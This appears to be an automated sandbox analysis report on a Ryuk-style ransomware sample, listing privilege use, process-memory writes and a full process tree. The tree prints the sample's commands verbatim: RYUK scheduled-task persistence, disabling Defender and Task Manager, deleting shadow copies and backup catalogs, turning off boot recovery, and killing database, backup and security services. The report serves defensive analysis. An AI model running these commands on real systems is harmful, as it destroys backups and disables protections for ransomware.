0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exepid process 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
taskkill.exetaskkill.exeWMIC.exevssvc.exetaskkill.exetaskkill.exetaskkill.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exewevtutil.exedescription pid process Token: SeDebugPrivilege 4900 taskkill.exe Token: SeDebugPrivilege 4844 taskkill.exe Token: SeIncreaseQuotaPrivilege 1084 WMIC.exe Token: SeSecurityPrivilege 1084 WMIC.exe Token: SeTakeOwnershipPrivilege 1084 WMIC.exe Token: SeLoadDriverPrivilege 1084 WMIC.exe Token: SeSystemProfilePrivilege 1084 WMIC.exe Token: SeSystemtimePrivilege 1084 WMIC.exe Token: SeProfSingleProcessPrivilege 1084 WMIC.exe Token: SeIncBasePriorityPrivilege 1084 WMIC.exe Token: SeCreatePagefilePrivilege 1084 WMIC.exe Token: SeBackupPrivilege 1084 WMIC.exe Token: SeRestorePrivilege 1084 WMIC.exe Token: SeShutdownPrivilege 1084 WMIC.exe Token: SeDebugPrivilege 1084 WMIC.exe Token: SeSystemEnvironmentPrivilege 1084 WMIC.exe Token: SeRemoteShutdownPrivilege 1084 WMIC.exe Token: SeUndockPrivilege 1084 WMIC.exe Token: SeManageVolumePrivilege 1084 WMIC.exe Token: 33 1084 WMIC.exe Token: 34 1084 WMIC.exe Token: 35 1084 WMIC.exe Token: 36 1084 WMIC.exe Token: SeBackupPrivilege 836 vssvc.exe Token: SeRestorePrivilege 836 vssvc.exe Token: SeAuditPrivilege 836 vssvc.exe Token: SeIncreaseQuotaPrivilege 1084 WMIC.exe Token: SeSecurityPrivilege 1084 WMIC.exe Token: SeTakeOwnershipPrivilege 1084 WMIC.exe Token: SeLoadDriverPrivilege 1084 WMIC.exe Token: SeSystemProfilePrivilege 1084 WMIC.exe Token: SeSystemtimePrivilege 1084 WMIC.exe Token: SeProfSingleProcessPrivilege 1084 WMIC.exe Token: SeIncBasePriorityPrivilege 1084 WMIC.exe Token: SeCreatePagefilePrivilege 1084 WMIC.exe Token: SeBackupPrivilege 1084 WMIC.exe Token: SeRestorePrivilege 1084 WMIC.exe Token: SeShutdownPrivilege 1084 WMIC.exe Token: SeDebugPrivilege 1084 WMIC.exe Token: SeSystemEnvironmentPrivilege 1084 WMIC.exe Token: SeRemoteShutdownPrivilege 1084 WMIC.exe Token: SeUndockPrivilege 1084 WMIC.exe Token: SeManageVolumePrivilege 1084 WMIC.exe Token: 33 1084 WMIC.exe Token: 34 1084 WMIC.exe Token: 35 1084 WMIC.exe Token: 36 1084 WMIC.exe Token: SeDebugPrivilege 4496 taskkill.exe Token: SeDebugPrivilege 4964 taskkill.exe Token: SeDebugPrivilege 440 taskkill.exe Token: SeSecurityPrivilege 4900 wevtutil.exe Token: SeBackupPrivilege 4900 wevtutil.exe Token: SeSecurityPrivilege 4748 wevtutil.exe Token: SeBackupPrivilege 4748 wevtutil.exe Token: SeSecurityPrivilege 1128 wevtutil.exe Token: SeBackupPrivilege 1128 wevtutil.exe Token: SeSecurityPrivilege 4920 wevtutil.exe Token: SeBackupPrivilege 4920 wevtutil.exe Token: SeSecurityPrivilege 4860 wevtutil.exe Token: SeBackupPrivilege 4860 wevtutil.exe Token: SeSecurityPrivilege 4832 wevtutil.exe Token: SeBackupPrivilege 4832 wevtutil.exe Token: SeSecurityPrivilege 1876 wevtutil.exe Token: SeBackupPrivilege 1876 wevtutil.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exedescription pid process target process PID 1244 wrote to memory of 1572 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 1572 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1572 wrote to memory of 1272 1572 cmd.exe schtasks.exe PID 1572 wrote to memory of 1272 1572 cmd.exe schtasks.exe PID 1244 wrote to memory of 2192 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 2192 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 4404 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 4404 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 4420 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 4420 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 4420 wrote to memory of 4876 4420 cmd.exe schtasks.exe PID 4420 wrote to memory of 4876 4420 cmd.exe schtasks.exe PID 1244 wrote to memory of 968 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 968 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 968 wrote to memory of 3668 968 cmd.exe attrib.exe PID 968 wrote to memory of 3668 968 cmd.exe attrib.exe PID 1244 wrote to memory of 2236 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 2236 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 2236 wrote to memory of 4500 2236 cmd.exe schtasks.exe PID 2236 wrote to memory of 4500 2236 cmd.exe schtasks.exe PID 1244 wrote to memory of 4100 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 4100 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 4100 wrote to memory of 3412 4100 cmd.exe schtasks.exe PID 4100 wrote to memory of 3412 4100 cmd.exe schtasks.exe PID 1244 wrote to memory of 3928 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 3928 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 3928 wrote to memory of 4460 3928 cmd.exe attrib.exe PID 3928 wrote to memory of 4460 3928 cmd.exe attrib.exe PID 1244 wrote to memory of 320 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 320 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 320 wrote to memory of 220 320 cmd.exe attrib.exe PID 320 wrote to memory of 220 320 cmd.exe attrib.exe PID 1244 wrote to memory of 4804 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 4804 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 4804 wrote to memory of 4688 4804 cmd.exe cmd.exe PID 4804 wrote to memory of 4688 4804 cmd.exe cmd.exe PID 1244 wrote to memory of 836 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 836 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 2788 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 2788 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 836 wrote to memory of 960 836 cmd.exe cmd.exe PID 836 wrote to memory of 960 836 cmd.exe cmd.exe PID 836 wrote to memory of 4900 836 cmd.exe taskkill.exe PID 836 wrote to memory of 4900 836 cmd.exe taskkill.exe PID 2788 wrote to memory of 3192 2788 cmd.exe reg.exe PID 2788 wrote to memory of 3192 2788 cmd.exe reg.exe PID 4688 wrote to memory of 3964 4688 cmd.exe icacls.exe PID 4688 wrote to memory of 3964 4688 cmd.exe icacls.exe PID 1244 wrote to memory of 2232 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 2232 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 4480 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 4480 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 740 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 740 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 960 wrote to memory of 4844 960 cmd.exe taskkill.exe PID 960 wrote to memory of 4844 960 cmd.exe taskkill.exe PID 1244 wrote to memory of 4552 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 4552 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 2716 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 2716 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 424 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 1244 wrote to memory of 424 1244 0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe cmd.exe PID 424 wrote to memory of 5032 424 cmd.exe reg.exe PID 424 wrote to memory of 5032 424 cmd.exe reg.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
-
Views/modifies file attributes 1 TTPs 5 IoCs
Processes:
attrib.exeattrib.exeattrib.exeattrib.exeattrib.exepid process 292 attrib.exe 3668 attrib.exe 4460 attrib.exe 220 attrib.exe 4732 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe"C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe"1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Drops startup file
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"3⤵
- Drops startup file
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /RU SYSTEM /RL HIGHEST /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /RU SYSTEM /RL HIGHEST /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exeschtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\0d25bbbeb68847cab4f3805bb8028ca901aa569abb038660c5febfe2ba24ec09.bin.sample.exe" /F3⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s ryuk.exe3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\attrib.exeattrib +h +s C:\ProgramData\ryuk.exe3⤵
- Views/modifies file attributes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeicacls * /grant Everyone:(OI)(CI)F /T /C /Q4⤵
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.execmd.exe /c taskkill /t /f /im sql*3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\taskkill.exetaskkill /t /f /im sql*4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskkill.exetaskkill /f /t /im veeam*3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog22⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog12⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exereg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f2⤵
-
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F2⤵
-
C:\Windows\system32\reg.exereg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c "C:\ProgramData\RyukReadMe.txt " && exit2⤵
-
C:\Windows\system32\cmd.execmd.exe /c "C:\ProgramData\RyukReadMe.txt "3⤵
- Checks computer location settings
- Modifies registry class
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\ProgramData\RyukReadMe.txt4⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet2⤵
-
C:\Windows\system32\cmd.execmd.exe /c vssadmin Delete Shadows /All /Quiet3⤵
-
C:\Windows\system32\vssadmin.exevssadmin Delete Shadows /All /Quiet4⤵
- Interacts with shadow copies
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c wmic shadowcopy delete2⤵
-
C:\Windows\system32\cmd.execmd.exe /c wmic shadowcopy delete3⤵
-
C:\Windows\System32\Wbem\WMIC.exewmic shadowcopy delete4⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures2⤵
-
C:\Windows\system32\cmd.execmd.exe /c bcdedit /set {default} boostatuspolicy ignoreallfailures3⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} boostatuspolicy ignoreallfailures4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c bcdedit /set {default} recoveryenabled no2⤵
-
C:\Windows\system32\cmd.execmd.exe /c bcdedit /set {default} recoveryenabled no3⤵
-
C:\Windows\system32\bcdedit.exebcdedit /set {default} recoveryenabled no4⤵
- Modifies boot configuration data using bcdedit
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c start cmd.exe /c wbadmin delete catalog -quiet/2⤵
-
C:\Windows\system32\cmd.execmd.exe /c wbadmin delete catalog -quiet/3⤵
-
C:\Windows\system32\wbadmin.exewbadmin delete catalog -quiet/4⤵
- Deletes backup catalog
- Drops file in Windows directory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop avpsus /y2⤵
-
C:\Windows\system32\net.exenet stop avpsus /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop avpsus /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop McAfeeDLPAgentService /y2⤵
-
C:\Windows\system32\net.exenet stop McAfeeDLPAgentService /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop McAfeeDLPAgentService /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop mfewc /y2⤵
-
C:\Windows\system32\net.exenet stop mfewc /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop mfewc /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop BMR Boot Service /y2⤵
-
C:\Windows\system32\net.exenet stop BMR Boot Service /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop BMR Boot Service /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop NetBackup BMR MTFTP Service /y2⤵
-
C:\Windows\system32\net.exenet stop NetBackup BMR MTFTP Service /y3⤵
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 stop NetBackup BMR MTFTP Service /y4⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c sc config SQLTELEMETRY start=disabled2⤵
-
